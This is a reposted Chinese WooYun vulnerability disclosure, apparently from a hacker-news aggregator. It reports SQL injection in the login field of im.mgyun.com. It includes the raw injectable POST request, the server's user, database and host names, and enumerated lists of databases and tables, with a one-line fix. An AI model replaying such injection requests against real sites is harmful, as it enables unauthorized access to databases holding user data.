记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

刷机大师某站点MSSQL注射(支持union)

2015-05-10 22:45

注入点:

code 区域
POST / HTTP/1.1

Content-Length: 110

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://im.mgyun.com/

Cookie: ASP.NET_SessionId=

Host: im.mgyun.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



LoginName=test*&Password=test&VerifyCode=



参数LoginName可注入。支持union,可报错。

漏洞证明:

mssqli_mgyun.jpg



current user: 'installmasteruser'

current db : 'InstallMaster'

Server Name : 'XINYI-104'

数据库:

code 区域
available databases [38]:

[*] AnalyzeSystem

[*] ApkGrabDB

[*] AppCoolPoints

[*] BaiduromLottery

[*] CPAPPLog

[*] DataCollectDB

[*] DataService_Devices

[*] DataService_Models2

[*] DataService_PCD

[*] distribution

[*] friendlinks

[*] InstallMasterLog

[*] IntegralMall

[*] KeywordLog

[*] LuckyDraw2013

[*] Mailman

[*] master

[*] MgyunAPI

[*] model

[*] msdb

[*] OpenPlatform

[*] OSMF

[*] ProductDownLog

[*] ProductManager

[*] productmanagerstatistics

[*] PushAppStatistics

[*] ReportServer

[*] ReportServerTempDB

[*] RomActiveLog

[*] RomChecker

[*] RomDownLog

[*] RomJDv3_1

[*] RomResource_Shadow

[*] tempdb

[*] UCenter

[*] UserPointsLog

[*] XGPushManagerDB

[*] XYAdmin



code 区域
Database: InstallMaster

[87 tables]

+-----------------------+

| AppClass |

| AppClass |

| AppConfig |

| AppList |

| AppSummary |

| AppToInstallSchemeRel |

| AppVersion |

| CPStatus_Summary |

| CPStatus_Week |

| CP_Account |

| CP_AccountV1 |

| CP_Activated |

| CP_AdminAPP |

| CP_AdminArea |

| CP_AdminStore |

| CP_Article |

| CP_Config |

| CP_DayAppInfo |

| CP_DayAppInfoV1 |

| CP_DayLayerMoney |

| CP_DayLayerMoneyV1 |

| CP_DayPeploeMoney |

| CP_DayPeploeMoneyV1 |

| CP_DecrementConfig |

| CP_Dynamic |

| CP_Flow |

| CP_Install |

| CP_P_Manager |

| CP_P_ManagerV1 |

| CP_P_UserToManager |

| CP_P_UserToManagerV1 |

| CP_ShareRatio |

| CP_WithDrawInfo |

| CP_WithDrawInfoState |

| ClientLog |

| ClientLog |

| ClientMenuCatagory |

| ClientMenuCatagory |

| Config |

| DailyUserList |

| DateTime |

| Devices |

| EmailActivate |

| FakeUserPoint |

| HistoryStore |

| IEMIAPackageName |

| IMEIDetail |

| IMEIToUser |

| ImmediateUserList |

| InstallIMEIList |

| InstallScheme |

| InstallTime |

| LayerRelation |

| MSummary |

| Message |

| MobileList |

| MyDateTime |

| OnLineClient |

| OnLineClient |

| OnLineStore |

| OperationLog |

| OrgLayer |

| Organization |

| PhoneMarketSupplier |

| PhoneMarketTransLog |

| PhoneMarketUser |

| PointEventLimit |

| PointEventLimit |

| PointSource |

| PointSum_Daily |

| PointSum_Event |

| PointSum_Monthly |

| PointSum_Weekly |

| PointSum_Yearly |

| PointsLog |

| ResetPwdRequest |

| Role |

| SendSMSLog |

| ShareRatio |

| TempMSummary |

| UserDetail |

| UserDetail |

| UserList |

| UserPointsInt |

| UserPointsInt |

| WebConfig |

| sysdiagrams |

+-----------------------+

修复方案:

参数过滤和转义

知识来源: www.wooyun.org/bugs/wooyun-2015-0103479

阅读:89798 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“刷机大师某站点MSSQL注射(支持union)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云